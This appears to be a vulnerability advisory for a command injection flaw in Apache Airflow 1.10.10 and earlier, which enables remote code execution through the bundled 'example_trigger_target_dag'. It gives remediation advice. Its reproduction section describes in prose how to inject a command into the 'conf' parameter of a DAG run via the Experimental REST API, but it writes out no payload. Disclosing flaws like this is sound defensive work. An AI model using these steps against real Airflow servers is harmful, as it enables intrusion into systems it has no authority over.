Apache Airflow Remote Code Execution Vulnerability in Example DAG

A remote code execution vulnerability has been identified in Apache Airflow versions 1.10.10 and prior. This issue arises from a command injection vulnerability in the 'example_trigger_target_dag' that is included with Airflow. It allows authenticated users to execute arbitrary commands as the user running the Airflow worker or scheduler, depending on the executor in use. However, if the 'load_examples' option is set to 'False' in the configuration, the vulnerability does not exist.

Impact

Exploitation of this vulnerability allows for remote code execution on the server where Apache Airflow is running.

Reproduction

To reproduce this vulnerability, an authenticated user can access the Airflow Experimental REST API, which is unauthenticated by default in version 1.10.10. The user can then create a new DAG run for the 'example_trigger_target_dag' and inject a command into the 'conf' parameter. Once the DAG is executed, the injected command will be executed on the server.

Remediation

Users are advised to upgrade to Apache Airflow version 1.10.11 or later. If an upgrade is not possible, the 'load_examples' option can be set to 'False' to disable the vulnerable example DAGs.